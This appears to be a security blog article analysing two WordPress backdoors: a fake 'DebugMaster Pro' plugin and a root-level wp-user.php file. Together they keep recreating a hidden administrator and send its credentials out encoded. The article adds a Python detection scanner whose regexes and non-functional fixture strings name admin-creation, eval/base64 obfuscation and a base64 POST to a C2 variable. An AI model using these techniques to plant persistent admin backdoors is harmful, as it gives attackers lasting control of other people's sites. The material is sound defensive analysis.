Attackers have stepped up their tactics by deploying stealthy backdoors disguised as legitimate WordPress components, ensuring persistent administrative access even after other malware is discovered and removed.
Their deceptive appearances belied their dangerous functions: one impersonated a plugin, the other camouflaged itself as a core file. Together, they formed a resilient system that gave hackers unfettered control over the compromised website.
During a recent cleanup of a compromised site, two malicious files were uncovered—each masquerading as standard WordPress code but designed to manipulate administrator accounts silently.
The first malicious component was located at ./wp-content/plugins/DebugMaster/DebugMaster.php.
Billed as “DebugMaster Pro,” it presented itself with plausible plugin metadata and typical developer comments. In reality, its contents were heavily obfuscated and packed with hidden routines.
On close inspection, this file contained code that created a secret administrator user with hardcoded credentials, then concealed that user by filtering queries and removing itself from the plugin list.
The second file, ./wp-user.php, sat at the root of the WordPress installation, appearing simply as another core file.
It was far more streamlined in design than the fake plugin but equally insidious. This script continuously checked for the presence of a specific admin user.

If the user existed, the file would delete and then immediately recreate it with the attacker’s known password; if the user did not exist, it would simply generate it.
The script forces WordPress to create a new user named help with the role of administrator. If the user already exists, the script restores its administrator privileges.
Through this cyclical process, any attempt to remove or modify the account was instantly reversed.
What Was the Malware Doing?
Both files shared the same objective: to guarantee ongoing administrative privileges for the intruders.
The complex backdoor disguised as DebugMaster Pro established a new administrator upon activation and communicated those credentials to a remote command-and-control server.

The credentials were formatted into JSON, Base64-encoded, and transmitted via an obfuscated endpoint—allowing attackers to monitor and harvest login details without triggering alarm.
Simultaneously, the wp-user.php script functioned as an aggressive recovery tool. It enforced the creation or recreation of the specified admin user on every execution, making manual removal futile.
Even if site owners noticed suspicious accounts and attempted to delete or rename them, the script restored the attacker’s access on the next page load or scheduled event.
Beyond account manipulation, the DebugMaster file injected external JavaScript into every visitor’s page, excluding administrators and any whitelisted IP addresses.
This injected code could serve multiple purposes—redirecting traffic to malicious domains, delivering spam content, or harvesting visitor data. It also collected IP addresses of administrators for reconnaissance, logging them locally or sending them back to the attackers.
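The two files above differ in complexity but leave the same footprints in source: a non-core PHP file at the install root, fixed-role account creation and deletion, hooks that hide a plugin or a user from the dashboard, eval/base64 obfuscation and base64-encoded outbound POSTs. The scanner below is an added example (not code from the article or from any cleanup tool) that walks a WordPress tree and reports those indicators; the indicator regexes and the constructed, non-functional fixture files are assumptions made for illustration, and the root-file list is WordPress core's.

```python
import os
import re
import tempfile
# Files WordPress ships at the install root; a root-level wp-user.php is not one of them.
CORE_ROOT_FILES = {
    "index.php", "wp-activate.php", "wp-blog-header.php", "wp-comments-post.php", "wp-config.php",
    "wp-config-sample.php", "wp-cron.php", "wp-links-opml.php", "wp-load.php", "wp-login.php",
    "wp-mail.php", "wp-settings.php", "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
}
# Source patterns for the behaviours described: fixed-role account creation, user
# deletion, dashboard hiding, eval/base64 obfuscation and base64-encoded outbound POSTs.
INDICATORS = {
    "creates_admin": re.compile(r"wp_(?:create|insert)_user\s*\(.{0,200}?administrator", re.S),
    "deletes_user": re.compile(r"wp_delete_user\s*\("),
    "hides_plugin": re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]"),
    "hides_user": re.compile(r"add_(?:action|filter)\s*\(\s*['\"]pre_user_query['\"]"),
    "obfuscation": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "exfil": re.compile(r"wp_remote_post\s*\(.{0,300}?base64_encode", re.S),
}
def scan_php(source: str) -> list[str]:
    # Names of every indicator present in one PHP source text, in INDICATORS order.
    return [name for name, rx in INDICATORS.items() if rx.search(source)]
def scan_tree(root: str) -> dict[str, list[str]]:
    # Walk an install; flag non-core PHP at the root and any file carrying indicators.
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in sorted(f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, fn)
            hits = ["unexpected_root_file"] if dirpath == root and fn not in CORE_ROOT_FILES else []
            with open(path, encoding="utf-8", errors="ignore") as fh:
                hits += scan_php(fh.read())
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings
# Constructed, non-functional fixtures that carry only the indicator strings.
FIXTURES = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
    "wp-user.php": "<?php if (username_exists('help')) { wp_delete_user($id); }\n"
                   "wp_insert_user(array('user_login' => 'help', 'role' => 'administrator'));\n",
    "wp-content/plugins/DebugMaster/DebugMaster.php":
        "<?php add_filter('all_plugins', 'hide'); add_action('pre_user_query', 'hide_u');\n"
        "eval(base64_decode($blob)); wp_remote_post($c2, array('body' => base64_encode($json)));\n",
}
def demo() -> dict[str, list[str]]:
    # Write the fixtures into a scratch install directory and scan it.
    with tempfile.TemporaryDirectory() as root:
        for rel, body in FIXTURES.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
```

Run `scan_tree("/path/to/wordpress")` against a real install; a clean site should produce no findings, and any hit on a root-level file or an `all_plugins`/`pre_user_query` hook deserves manual review.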
Analysis of the Malware
The fake DebugMaster Pro plugin exemplifies how threat actors leverage social engineering and technical obfuscation.
By mimicking a legitimate developer tool plugin, attackers reduced scrutiny from site administrators who might overlook an innocuous-sounding add-on.
In combination, these two files created a dual-layered persistence strategy: one layer for stealth and remote monitoring, the other for brute-force restoration of credentials.
The backdoor code was hidden behind layers of Base64 encoding, making detection by signature-based scanners difficult.
Its filtering hooks removed any trace of its existence from the WordPress dashboard, while its remote logging channel ensured attackers received real-time updates on new administrator accounts.
Meanwhile, the wp-user.php backdoor demonstrated a simple yet effective persistence mechanism. Rather than relying on complex evasion techniques, it guaranteed that the attacker’s chosen account could never be permanently removed.
This brute-force approach to account maintenance meant that even a skilled administrator could not outpace the script without first identifying and deleting the malicious file itself.
This hybrid method allowed attackers to remain embedded within the WordPress site indefinitely, evading cleanup efforts and retaining full control.
Website owners are urged to audit all plugin directories and core files for unauthorized modifications, enable file integrity monitoring, and enforce strict administrative account reviews to defend against these sophisticated silent malware campaigns.